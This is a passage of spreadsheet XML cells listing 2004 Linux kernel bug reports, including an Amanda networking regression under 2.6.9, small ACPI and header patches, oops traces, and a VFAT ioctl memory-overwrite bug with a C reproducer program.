    <t>Distribution: Fedora Core 2 Hardware Environment: Pentium III @800MHz, 384 MB memory, Adaptec AIC-7892A U160 SCSI controller, SEAGATE Model: ST39204LW drive, Lite-ON LNE100TX NIC, Gateway GP 800 computer. This machine is the Amanda tape server. Software Environment: Amanda 2.4.4p2 Software, Fedora Core 2 environment with vanilla 2.6.9 kernel. Problem Description: Amanda clients exchanges UDP packets with the server giving it a TCP port number with which to connect in order to receive files to be dumped to tape. Under kernel-2.6.8.1 the sofware performs perfectly. Under kernel-2.6.9, with exactly the same Amanda software, the UDP packet exchange seems to occur, but no TCP connection between client and server occurs. The client eventually times out with messages like: sendbackup: time 0.000: stream_server: waiting for connection: 0.0.0.0.32951 sendbackup: time 0.000: stream_server: waiting for connection: 0.0.0.0.32952 sendbackup: time 0.000: stream_server: waiting for connection: 0.0.0.0.32953 sendbackup: time 0.000: waiting for connect on 32951, then 32952, then 32953 sendbackup: time 29.995: stream_accept: timeout after 30 seconds sendbackup: time 29.995: timeout on data port 32951 sendbackup: time 59.990: stream_accept: timeout after 30 seconds sendbackup: time 59.990: timeout on mesg port 32952 sendbackup: time 89.987: stream_accept: timeout after 30 seconds sendbackup: time 89.987: timeout on index port 32953 sendbackup: time 89.987: pid 3008 finish time Thu Oct 21 12:30:38 2004 Running tcpdump on both client and server shows no TCP traffic at all. I have completely disabled iptables in an effort to allow the traffic to pass. No effect. Re-compiling the Amanda software had no effect. Switching back to kernel-2.6.8.1 allows it to run normally.lspci -vvv 00:00.0 Host bridge: Intel Corp. 440BX/ZX/DX - 82443BX/ZX/DX Host bridge (rev 03) Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- Latency: 64 Region 0: Memory at f8000000 (32-bit, prefetchable) Capabilities: [a0] AGP version 1.0 Status: RQ=32 Iso- ArqSz=0 Cal=0 SBA+ ITACoh- GART64- HTrans- 64bit- FW- AGP3- Rate=x1,x2 Command: RQ=1 ArqSz=0 Cal=0 SBA- AGP- GART64- 64bit- FW- Rate=&lt;none&gt; 00:01.0 PCI bridge: Intel Corp. 440BX/ZX/DX - 82443BX/ZX/DX AGP bridge (rev 03) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle+ MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66Mhz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 128 Bus: primary=00, secondary=01, subordinate=01, sec-latency=64 I/O behind bridge: 0000f000-00000fff Memory behind bridge: f5000000-f5ffffff Prefetchable memory behind bridge: fc000000-fdffffff BridgeCtl: Parity- SERR- NoISA+ VGA+ MAbort- &gt;Reset- FastB2B+ 00:07.0 ISA bridge: Intel Corp. 82371AB/EB/MB PIIX4 ISA (rev 02) Control: I/O+ Mem+ BusMaster+ SpecCycle+ MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 00:07.1 IDE interface: Intel Corp. 82371AB/EB/MB PIIX4 IDE (rev 01) (prog-if 80 [Master]) Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64 Region 4: I/O ports at 1820 [size=16] 00:07.2 USB Controller: Intel Corp. 82371AB/EB/MB PIIX4 USB (rev 01) (prog-if 00 [UHCI]) Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64 Interrupt: pin D routed to IRQ 9 Region 4: I/O ports at 1800 [size=32] 00:07.3 Bridge: Intel Corp. 82371AB/EB/MB PIIX4 ACPI (rev 02) Control: I/O+ Mem+ BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Interrupt: pin ? routed to IRQ 9 00:0e.0 SCSI storage controller: Adaptec AIC-7892A U160/m (rev 02) Subsystem: Adaptec 29160 Ultra160 SCSI Controller Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 72 (10000ns min, 6250ns max), Cache Line Size 08 Interrupt: pin A routed to IRQ 11 BIST result: 00 Region 0: I/O ports at 1000 [disabled] Region 1: Memory at f4000000 (64-bit, non-prefetchable) [size=4K] Capabilities: [dc] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:10.0 Ethernet controller: Lite-On Communications Inc LNE100TX (rev 20) Subsystem: Netgear FA310TX Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64 Interrupt: pin A routed to IRQ 9 Region 0: I/O ports at 1400 Region 1: Memory at f4001000 (32-bit, non-prefetchable) [size=256] 01:00.0 VGA compatible controller: nVidia Corporation NV5M64 [RIVA TNT2 Model 64/Model 64 Pro] (rev 15) (prog-if 00 [VGA]) Subsystem: VISIONTEK: Unknown device 0002 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64 (1250ns min, 250ns max) Interrupt: pin A routed to IRQ 11 Region 0: Memory at f5000000 (32-bit, non-prefetchable) Region 1: Memory at fc000000 (32-bit, prefetchable) [size=32M] Capabilities: [60] Power Management version 1 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [44] AGP version 2.0 Status: RQ=32 Iso- ArqSz=0 Cal=0 SBA- ITACoh- GART64- HTrans- 64bit- FW- AGP3- Rate=x1,x2,x4 Command: RQ=1 ArqSz=0 Cal=0 SBA- AGP- GART64- 64bit- FW- Rate=&lt;none&gt; more /proc/cpuinfo processor : 0 vendor_id : GenuineIntel cpu family : 6 model : 8 model name : Pentium III (Coppermine) stepping : 3 cpu MHz : 795.899 cache size : 256 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 2 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 sep mtrr pge mca cmov pat pse36 mmx fxsr sse bogomips : 1572.86 more /proc/modules uhci_hcd 29136 0 - Live 0xd8997000 more /proc/iomem 00000000-0009f3ff : System RAM 0009f400-0009ffff : reserved 000a0000-000bffff : Video RAM area 000c0000-000cffff : Video ROM 000d0000-000d65ff : Adapter ROM 000e4000-000effff : Adapter ROM 000f0000-000fffff : System ROM 00100000-040fd7ff : System RAM 00100000-003296b0 : Kernel code 003296b1-003fbcbf : Kernel data 040fd800-040ff7ff : ACPI Tables 040ff800-040ffbff : ACPI Non-volatile Storage 040ffc00-17ffffff : System RAM f4000000-f4000fff : 0000:00:0e.0 f4000000-f4000fff : aic7xxx f4001000-f40010ff : 0000:00:10.0 f4001000-f40010ff : tulip f5000000-f5ffffff : PCI Bus #01 f5000000-f5ffffff : 0000:01:00.0 f8000000-fbffffff : 0000:00:00.0 fc000000-fdffffff : PCI Bus #01 fc000000-fdffffff : 0000:01:00.0 fc000000-fc17ffff : vesafb fffe7000-ffffffff : reserved 0000-001f : dma1 0020-0021 : pic1 0040-0043 : timer0 0050-0053 : timer1 0060-006f : keyboard 0070-0077 : rtc 0080-008f : dma page reg 00a0-00a1 : pic2 00c0-00df : dma2 00f0-00ff : fpu 0170-0177 : ide1 01f0-01f7 : ide0 02f8-02ff : serial 0376-0376 : ide1 03c0-03df : vesafb 03f6-03f6 : ide0 03f8-03ff : serial 0cf8-0cff : PCI conf1 1000-10ff : 0000:00:0e.0 1400-14ff : 0000:00:10.0 1400-14ff : tulip 1800-181f : 0000:00:07.2 1800-181f : uhci_hcd 1820-182f : 0000:00:07.1 1820-1827 : ide0 1828-182f : ide1 7000-701f : 0000:00:07.3 8000-803f : 0000:00:07.3 more /proc/scsi/scsi Attached devices: Host: scsi0 Channel: 00 Id: 00 Lun: 00 Vendor: SEAGATE Model: ST39204LW Rev: 0006 Type: Direct-Access ANSI SCSI revision: 03 Host: scsi0 Channel: 00 Id: 06 Lun: 00 Vendor: SEAGATE Model: DAT 06240-XXX Rev: 8110 Type: Sequential-Access ANSI SCSI revision: 03 Steps to reproduce: Run Amanda server on kernel-2.6.9.</t>
  </si>
  <si>
    <t>Pavel Machek</t>
  </si>
  <si>
    <t>Implement ACPI 3.0 Timer function</t>
  </si>
  <si>
    <t>2004-10-22 19:06 UTC</t>
  </si>
  <si>
    <t>2005-08-07 18:21 UTC</t>
  </si>
  <si>
    <t>With ACPICA 20040924 the interpreter recognizes the "Timer" operand, but the OS layer has just a stub at this point to supply the 64-bit timer value: 1.56/drivers/acpi/osl.c 2004-10-22 16:11:56 -04:00 +++ 1.57/drivers/acpi/osl.c 2004-10-22 21:59:54 -04:00 @@ -326,6 +326,29 @@ } } +/* + * Support ACPI 3.0 AML Timer operand + * Returns 64-bit free-running, monotonically increasing timer + * with 100ns granularity + */ +u64 +acpi_os_get_timer (void) +{ + static u64 t; + +#ifdef CONFIG_HPET + /* TBD: use HPET if available */ +#endif + +#ifdef CONFIG_X86_PM_TIMER + /* TBD: default to PM timer if HPET was not available */ +#endif + if (!t) + printk(KERN_ERR PREFIX "acpi_os_get_timer() TBD\n"); + + return(++t); +} + acpi_status acpi_os_read_port( acpi_io_address port,</t>
  </si>
  <si>
    <t>Andreas Schwab</t>
  </si>
  <si>
    <t>platform_ppc-32</t>
  </si>
  <si>
    <t>fix for linux/types.h header</t>
  </si>
  <si>
    <t>2004-10-24 04:02 UTC</t>
  </si>
  <si>
    <t>Michiel Broek</t>
  </si>
  <si>
    <t>2005-07-03 06:29 UTC</t>
  </si>
  <si>
    <t>Distribution: Slackware Hardware Environment: HPPA Software Environment: Problem Description: compile problems with some applications Steps to reproduce: The fix found is here: http://www.ussg.iu.edu/hypermail/linux/kernel/0409.2/0723.html Next is a copy of the applied patch. The kernel still compiles normal. --- linux-2.6.9-pa1/include/linux/types.h.org 2004-10-23 22:38:23.355067000 +0200 +++ linux-2.6.9-pa1/include/linux/types.h 2004-10-23 22:39:32.195067000 +0200 @@ -140,6 +140,13 @@ #define pgoff_t unsigned long #endif +#endif /* __KERNEL_STRICT_NAMES */ + +/* + * Below are truly Linux-specific types that should never collide with + * any application/library that wants linux/types.h. + */ + #ifdef __CHECKER__ #define __bitwise __attribute__((bitwise)) #else @@ -153,13 +160,6 @@ typedef __u64 __bitwise __le64; typedef __u64 __bitwise __be64; -#endif /* __KERNEL_STRICT_NAMES */ - -/* - * Below are truly Linux-specific types that should never collide with - * any application/library that wants linux/types.h. - */ - struct ustat { __kernel_daddr_t f_tfree; __kernel_ino_t f_tinode;</t>
  </si>
  <si>
    <t>kernel BUG at mm/rmap.c:474!</t>
  </si>
  <si>
    <t>2004-10-25 04:49 UTC</t>
  </si>
  <si>
    <t>Zbigniew Braniecki</t>
  </si>
  <si>
    <t>2005-08-07 13:30 UTC</t>
  </si>
  <si>
    <t>Distribution: Slackware 10 Oct 25 04:41:47 www kernel: ------------[ cut here ]------------ Oct 25 04:41:47 www kernel: kernel BUG at mm/rmap.c:474! Oct 25 04:41:47 www kernel: invalid operand: 0000 [#4] Oct 25 04:41:47 www kernel: PREEMPT Oct 25 04:41:47 www kernel: Modules linked in: Oct 25 04:41:47 www kernel: CPU: 0 Oct 25 04:41:47 www kernel: EIP: 0060:[&lt;c0147319&gt;] Not tainted VLI Oct 25 04:41:47 www kernel: EFLAGS: 00010286 (2.6.9) Oct 25 04:41:47 www kernel: EIP is at page_remove_rmap+0x29/0x40 Oct 25 04:41:47 www kernel: eax: ffffffff ebx: 000dd000 ecx: c1160bc0 edx: c1160bc0 Oct 25 04:41:47 www kernel: esi: c5e6f894 edi: c1160bc0 ebp: 00100000 esp: c9e93e90 Oct 25 04:41:47 www kernel: ds: 007b es: 007b ss: 0068 Oct 25 04:41:47 www kernel: Process show_bug.cgi (pid: 16375, threadinfo=c9e92000 task=cdac9020) Oct 25 04:41:47 www kernel: Stack: c0140ce6 c1160bc0 c02e6790 c9dec7a0 00000000 0b05e067 08948000 c4325088 Oct 25 04:41:47 www kernel: 08648000 00000000 c0140e47 c045a008 c4325084 08548000 00100000 00000000 Oct 25 04:41:47 www kernel: c045a008 08548000 c4325088 08648000 00000000 c0140ebb c045a008 c4325084 Oct 25 04:41:47 www kernel: Call Trace: Oct 25 04:41:47 www kernel: [&lt;c0140ce6&gt;] zap_pte_range+0x126/0x230 Oct 25 04:41:47 www kernel: [&lt;c02e6790&gt;] ip_rcv_finish+0x0/0x270 Oct 25 04:41:47 www kernel: [&lt;c0140e47&gt;] zap_pmd_range+0x57/0x80 Oct 25 04:41:47 www kernel: [&lt;c0140ebb&gt;] unmap_page_range+0x4b/0x80 Oct 25 04:41:47 www kernel: [&lt;c0140fed&gt;] unmap_vmas+0xfd/0x1c0 Oct 25 04:41:47 www kernel: [&lt;c0145593&gt;] exit_mmap+0x83/0x160 Oct 25 04:41:47 www kernel: [&lt;c01161d4&gt;] mmput+0x64/0xb0 Oct 25 04:41:47 www kernel: [&lt;c011aa72&gt;] do_exit+0x152/0x420 Oct 25 04:41:47 www kernel: [&lt;c010654d&gt;] do_IRQ+0xfd/0x130 Oct 25 04:41:47 www kernel: [&lt;c011adca&gt;] do_group_exit+0x3a/0xb0 Oct 25 04:41:47 www kernel: [&lt;c010421b&gt;] syscall_call+0x7/0xb Oct 25 04:41:47 www kernel: Code: 26 00 8b 54 24 04 8b 02 f6 c4 08 75 28 83 42 08 ff 0f 98 c0 84 c0 74 11 8b 42 08 40 78 0d 9c 58 fa ff 0d d0 70 46 c0 50 9d 90 c3 &lt;0f&gt; 0b da 01 33 7a 35 c0 eb e9 0f 0b d7 01 33 7a 35 c0 eb ce 8d Oct 25 04:41:47 www kernel: &lt;6&gt;note: show_bug.cgi[16375] exited with preempt_count 1 I found it in syslog today.</t>
  </si>
  <si>
    <t>Pawel Staszewski</t>
  </si>
  <si>
    <t>LAPIC-mode poweroff on Dell D600</t>
  </si>
  <si>
    <t>2004-10-26 00:37 UTC</t>
  </si>
  <si>
    <t>2004-12-05 19:38 UTC</t>
  </si>
  <si>
    <t>Distribution: Hardware Environment: Dell Latitude D600 Software Environment: Problem Description: No poweroff with both ACPI and LAPIC enabled Steps to reproduce:</t>
  </si>
  <si>
    <t>Anton</t>
  </si>
  <si>
    <t>VFAT_IOCTL_READDIR_BOTH ioctl corrupts userspace if VFAT partition mounted with utf8</t>
  </si>
  <si>
    <t>2004-10-26 15:01 UTC</t>
  </si>
  <si>
    <t>Alex Villacis Lasso</t>
  </si>
  <si>
    <t>2004-11-05 10:02 UTC</t>
  </si>
  <si>
    <t>Distribution: Fedora Core 2 with kernel 2.6.9 Hardware Environment: Intel Pentium 3 with 418 Mb of RAM Software Environment: (output from scripts/ver_linux) If some fields are empty or look unusual you may have an old version. Compare to the current minimal requirements in Documentation/Changes. Linux srv64.palosanto.com 2.6.9 #1 Tue Oct 26 15:52:48 ECT 2004 i686 i686 i386 GNU/Linux Gnu C 3.3.3 Gnu make 3.80 binutils 2.15.90.0.3 util-linux 2.12 mount 2.12 module-init-tools 2.4.26 e2fsprogs 1.35 jfsutils 1.1.4 reiserfsprogs 3.6.13 reiser4progs line pcmcia-cs 3.2.7 quota-tools 3.10. PPP 2.4.2 nfs-utils 1.0.6 Linux C Library 2.3.3 Dynamic linker (ldd) 2.3.3 Procps 3.2.0 Net-tools 1.60 Kbd 1.12 Sh-utils 5.2.1 Modules Loaded snd_emu10k1 snd_rawmidi snd_pcm snd_timer snd_seq_device snd_ac97_codec snd_page_alloc snd_util_mem snd_hwdep snd soundcore md5 ipv6 parport_pc lp parport tulip floppy sg scsi_mod microcode nls_cp850 vfat fat dm_mod uhci_hcd button battery ac Problem Description: When the VFAT_IOCTL_READDIR_BOTH is used on a directory in a VFAT partition to read both the long and short names on the directory, the calling program is supposed to supply a pair of directory records to store the short and long versions of the filename. When the filesystem is mounted with the utf8 option, this ioctl attempts to overwrites userspace memory outside the buffer supplied by the program, as soon as the ioctl calls reach the first long filename in the directory. Depending on how the program supplied the buffer, the results can vary from an EFAULT in errno, to a stack corruption on function return which yields an inmediate SIGSEGV. This problem was first spotted on WINE, but is not specific to it - the SIGSEGV was caused by the ioctl loop in a directory traversal function. This problem was first experienced in kernel 2.6.8-1.521 supplied by Fedora Core 2. The problem still persists in recompiled vanilla kernel 2.6.9. One workaround is to disable the utf8 option when mounting VFAT partitions. However, this might not be an option for everyone. Steps to reproduce: The following program reproduces the bug. Note that this program mallocs the memory for the buffers. A previous version declared the records as local variables and reliably crashed with SIGSEGV: ---------------------------------- #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;errno.h&gt; #include &lt;string.h&gt; #include &lt;unistd.h&gt; #include &lt;sys/types.h&gt; #include &lt;sys/stat.h&gt; #include &lt;fcntl.h&gt; #include &lt;sys/ioctl.h&gt; typedef struct { long d_ino; long d_off; unsigned short d_reclen; char d_name[256]; } KERNEL_DIRENT; #define VFAT_IOCTL_READDIR_BOTH _IOR('r', 1, KERNEL_DIRENT [2] ) #ifndef O_DIRECTORY # define O_DIRECTORY 0200000 #endif int main(int argc, char ** argv) { KERNEL_DIRENT * de; int fd; int ioctl_result; if (argc &lt; 2) { fprintf(stderr, "%s directory_in_vfat_partition\n", argv[0]); } else { de = (KERNEL_DIRENT *)calloc(2, sizeof(KERNEL_DIRENT)); if (de != NULL) { fd = open(argv[1], O_RDONLY | O_DIRECTORY); if (fd != -1) { memset(de, 0, 2 * sizeof(KERNEL_DIRENT)); while ((ioctl_result = ioctl( fd, VFAT_IOCTL_READDIR_BOTH, de)) != -1 &amp;&amp; de[0].d_reclen != 0) { fprintf(stderr, "offset: %02d reclen: %02d [%12s] %s\n", de[0].d_off, de[0].d_reclen, de[0].d_name, de[1].d_name[0] ? de[1].d_name : ""); } if (ioctl_result == -1) perror("ioctl"); close(fd); } else { perror("open"); } free(de); } else { fprintf(stderr, "Out of memory\n"); } } return 0; } ---------------------------------- This is a sample session that demonstrates the bug (with gcc -Os -Wall prueba_vfat_dirent.c -o prueba_vfat_dirent): [root@srv64 cpp]# mount /dev/hda6 /win-temp -o umask=0,auto,noexec,rw,codepage=850,nonumtail,quiet [root@srv64 cpp]# ls -l /win-temp/ total 20900 drwxrwxrwx 5 root root 2048 sep 14 11:02 backup -rwxrwxrwx 1 root root 20008524 ene 19 2004 foxproxy.tar.gz drwxrwxrwx 3 root root 6144 oct 22 20:29 girls-bz2 drwxrwxrwx 12 root root 6144 sep 21 18:04 imagenes drwxrwxrwx 54 root root 22528 ago 20 19:19 musica drwxrwxrwx 2 root root 2048 dic 23 2002 Recycled drwxrwxrwx 25 root root 4096 oct 1 17:56 referencias drwxrwxrwx 3 root root 2048 oct 18 14:37 System Volume Information -rwxrwxrwx 1 root root 1347170 oct 22 20:23 test.txt [root@srv64 cpp]# ./prueba_vfat_dirent /win-temp offset: 00 reclen: 01 [ .] offset: 00 reclen: 02 [ ..] offset: 00 reclen: 08 [ recycled] Recycled offset: 00 reclen: 08 [ girls-bz] girls-bz2 offset: 00 reclen: 06 [ musica] musica offset: 00 reclen: 08 [ system~1] System Volume Information offset: 00 reclen: 08 [ imagenes] offset: 00 reclen: 06 [ backup] backup offset: 00 reclen: 08 [ refere~1] referencias offset: 00 reclen: 08 [ test.txt] test.txt offset: 00 reclen: 11 [ foxpro~2.gz] foxproxy.tar.gz [root@srv64 cpp]# umount /win-temp [root@srv64 cpp]# mount /dev/hda6 /win-temp -o umask=0,auto,noexec,rw,codepage=850,nonumtail,quiet,utf8 [root@srv64 cpp]# ls -l /win-temp total 20900 drwxrwxrwx 5 root root 2048 sep 14 11:02 backup -rwxrwxrwx 1 root root 20008524 ene 19 2004 foxproxy.tar.gz drwxrwxrwx 3 root root 6144 oct 22 20:29 girls-bz2 drwxrwxrwx 12 root root 6144 sep 21 18:04 imagenes drwxrwxrwx 54 root root 22528 ago 20 19:19 musica drwxrwxrwx 2 root root 2048 dic 23 2002 Recycled drwxrwxrwx 25 root root 4096 oct 1 17:56 referencias drwxrwxrwx 3 root root 2048 oct 18 14:37 System Volume Information -rwxrwxrwx 1 root root 1347170 oct 22 20:23 test.txt [root@srv64 cpp]# ./prueba_vfat_dirent /win-temp offset: 00 reclen: 01 [ .] offset: 00 reclen: 02 [ ..] ioctl: Bad address [root@srv64 cpp]# umount /win-temp/ The presence of the utf8 option causes the ioctl to misbehave and attempt to overwrite outside the buffer. Since the sample program uses malloc to get the buffer, the ioctl reports EFAULT. When the records are in the stack (as is the case in WINE), the kernel happily overwrites beyond the buffer without reporting any EFAULT, and later the program crashes on function return. I am currently examining the 2.6.9 sourcecode (fs/fat/dir.c) to see whether I can supply a patch to fix this. Maybe someone who knows more about this ioctl than me may fix this issue. Thanks for your attention: Alex Villac</t>
  </si>
  <si>
    <t>using smp_processor_id() in preemptible code: named/1119</t>
  </si>
  <si>
    <t>2004-10-26 15:03 UTC</t>
  </si>
  <si>
    <t>2004-12-02 10:27 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Sarge Hardware Environment: 2xP4 Xeon 2GHz with HT disabled 4GB RAM Software Environment: squid,named Problem Description: dmesg is reporting: using smp_processor_id() in preemptible code: named/1119 Steps to reproduce: using smp_processor_id() in preemptible code: named/1119 [&lt;c01175b2&gt;] smp_processor_id+0x8f/0x95 [&lt;c011f74d&gt;] local_bh_enable+0x51/0x90 [&lt;c035c55d&gt;] __ip_route_output_key+0xeb/0xf6 [&lt;c035c597&gt;] ip_route_output_flow+0x2f/0x9d [&lt;c011f74d&gt;] local_bh_enable+0x51/0x90 [&lt;c032ac20&gt;] release_sock+0x1b/0x71 [&lt;c038033d&gt;] udp_sendmsg+0x544/0x759 [&lt;c0387d12&gt;] inet_sendmsg+0x4d/0x59 [&lt;c0327434&gt;] sock_sendmsg+0xe5/0x100 [&lt;c0116a62&gt;] find_busiest_group+0xe4/0x316 [&lt;c0116d32&gt;] find_busiest_queue+0x9e/0xbc [&lt;c0116f49&gt;] load_balance_newidle+0x89/0x98 [&lt;c024e070&gt;] copy_from_user+0x42/0x6e [&lt;c0118d57&gt;] autoremove_wake_function+0x0/0x57 [&lt;c0328e70&gt;] sys_sendmsg+0x189/0x1e6 [&lt;c012e016&gt;] get_futex_key+0x42/0x189 [&lt;c012e5b6&gt;] unqueue_me+0x5a/0xa5 [&lt;c0118b5f&gt;] add_wait_queue+0x1a/0x46 [&lt;c012e74a&gt;] futex_wait+0x149/0x19e [&lt;c01176e4&gt;] __wake_up+0x40/0x56 [&lt;c012e1c1&gt;] wake_futex+0x37/0x62 [&lt;c012e25d&gt;] futex_wake+0x71/0xbe [&lt;c024e070&gt;] copy_from_user+0x42/0x6e [&lt;c03292fa&gt;] sys_socketcall+0x236/0x254 [&lt;c0105c29&gt;] syscall_call+0x7/0xb</t>
  </si>
  <si>
    <t>ACPI-1133: *** Error: Method execution failed [\_SB_.PCI0.PIB_.EC0_._Q20] (Node cfc0b4c0), AE_AML_UNINITIALIZED_LOCAL</t>
  </si>
  <si>
    <t>2004-10-28 11:14 UTC</t>
  </si>
  <si>
    <t>Brice MEALIER</t>
  </si>
  <si>
    <t>Problem Description: dmesg output: (ACPI related) ACPI: RSDP (v000 PTLTD ) @ 0x000f6890 ACPI: RSDT (v001 SONY K5 0x06040000 LTP 0x00000000) @ 0x0fef7647 ACPI: FADT (v001 SONY K5 0x06040000 PTL_ 0x000f4240) @ 0x0fefbdff ACPI: BOOT (v001 PTLTD $SBFTBL$ 0x06040000 LTP 0x00000001) @ 0x0fefbe73 ACPI: SSDT (v001 PTLTD POWERNOW 0x06040000 LTP 0x00000001) @ 0x0fefbe9b ACPI: DSDT (v001 SONY X0 0x06040000 MSFT 0x0100000e) @ 0x00000000 ACPI: PM-Timer IO Port: 0x8008 ACPI: IRQ9 SCI: Level Trigger. ACPI: Subsystem revision 20040816 ACPI: Interpreter enabled ACPI: Using PIC for interrupt routing ACPI: PCI Root Bridge [PCI0] (00:00) ACPI: PCI Interrupt Routing Table [\_SB_.PCI0._PRT] ACPI: PCI Interrupt Link [LNKA] (IRQs 9 10 11 12) *0, disabled. ACPI: PCI Interrupt Link [LNKB] (IRQs *9 10 11 12) ACPI: PCI Interrupt Link [LNKC] (IRQs 9 10 *11 12) ACPI: PCI Interrupt Link [LNKD] (IRQs *9 10 11 12) ACPI: Embedded Controller [EC0] (gpe 1) ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.PPB_._PRT] PCI: Using ACPI for IRQ routing ACPI: PCI Interrupt Link [LNKB] enabled at IRQ 9 ACPI: PCI interrupt 0000:00:0c.0[A] -&gt; GSI 9 (level, low) -&gt; IRQ 9 ACPI: PCI Interrupt Link [LNKA] enabled at IRQ 11 ACPI: PCI interrupt 0000:00:0e.0[A] -&gt; GSI 11 (level, low) -&gt; IRQ 11 ACPI: PCI interrupt 0000:00:0e.1[B] -&gt; GSI 9 (level, low) -&gt; IRQ 9 ACPI: PCI Interrupt Link [LNKC] enabled at IRQ 11 ACPI: PCI interrupt 0000:00:0e.2[C] -&gt; GSI 11 (level, low) -&gt; IRQ 11 ACPI: PCI interrupt 0000:00:10.0[A] -&gt; GSI 11 (level, low) -&gt; IRQ 11 ACPI: PCI interrupt 0000:00:10.1[B] -&gt; GSI 9 (level, low) -&gt; IRQ 9 ACPI: PCI interrupt 0000:00:10.2[C] -&gt; GSI 11 (level, low) -&gt; IRQ 11 ACPI: PCI Interrupt Link [LNKD] enabled at IRQ 9 ACPI: PCI interrupt 0000:00:10.3[D] -&gt; GSI 9 (level, low) -&gt; IRQ 9 ACPI: PCI interrupt 0000:00:11.1[A] -&gt; GSI 11 (level, low) -&gt; IRQ 11 ACPI: PCI interrupt 0000:00:11.5[C] -&gt; GSI 11 (level, low) -&gt; IRQ 11 ACPI: PCI interrupt 0000:00:11.6[C] -&gt; GSI 11 (level, low) -&gt; IRQ 11 ACPI: PCI interrupt 0000:01:00.0[A] -&gt; GSI 11 (level, low) -&gt; IRQ 11 ACPI: (supports S0 S3 S4 S5) ACPI wakeup devices: ACPI: PCI interrupt 0000:00:11.1[A] -&gt; GSI 11 (level, low) -&gt; IRQ 11 ACPI: Processor [CPU0] (supports C1 C2, 16 throttling states) ACPI: PCI interrupt 0000:00:0c.0[A] -&gt; GSI 9 (level, low) -&gt; IRQ 9 ACPI: PCI interrupt 0000:00:0e.0[A] -&gt; GSI 11 (level, low) -&gt; IRQ 11 ACPI: PCI interrupt 0000:00:0e.1[B] -&gt; GSI 9 (level, low) -&gt; IRQ 9 ACPI: PCI interrupt 0000:00:0e.2[C] -&gt; GSI 11 (level, low) -&gt; IRQ 11 ACPI: PCI interrupt 0000:00:10.0[A] -&gt; GSI 11 (level, low) -&gt; IRQ 11 ACPI: PCI interrupt 0000:00:10.1[B] -&gt; GSI 9 (level, low) -&gt; IRQ 9 ACPI: PCI interrupt 0000:00:10.2[C] -&gt; GSI 11 (level, low) -&gt; IRQ 11 ACPI: PCI interrupt 0000:00:10.3[D] -&gt; GSI 9 (level, low) -&gt; IRQ 9 ACPI: PCI interrupt 0000:00:11.5[C] -&gt; GSI 11 (level, low) -&gt; IRQ 11 ACPI-1133: *** Error: Method execution failed [\_SB_.PCI0.PIB_.EC0_._Q20] (Node cfc0b4c0), AE_AML_UNINITIALIZED_LOCAL ACPI-1133: *** Error: Method execution failed [\_SB_.PCI0.PIB_.EC0_._Q20] (Node cfc0b4c0), AE_AML_UNINITIALIZED_LOCAL ACPI-1133: *** Error: Method execution failed [\_SB_.PCI0.PIB_.EC0_._Q20] (Node cfc0b4c0), AE_AML_UNINITIALIZED_LOCAL ACPI-1133: *** Error: Method execution failed [\_SB_.PCI0.PIB_.EC0_._Q20] (Node cfc0b4c0), AE_AML_UNINITIALIZED_LOCAL ACPI-1133: *** Error: Method execution failed [\_SB_.PCI0.PIB_.EC0_._Q20] (Node cfc0b4c0), AE_AML_UNINITIALIZED_LOCAL ACPI-1133: *** Error: Method execution failed [\_SB_.PCI0.PIB_.EC0_._Q20] (Node cfc0b4c0), AE_AML_UNINITIALIZED_LOCAL ACPI-1133: *** Error: Method execution failed [\_SB_.PCI0.PIB_.EC0_._Q20] (Node cfc0b4c0), 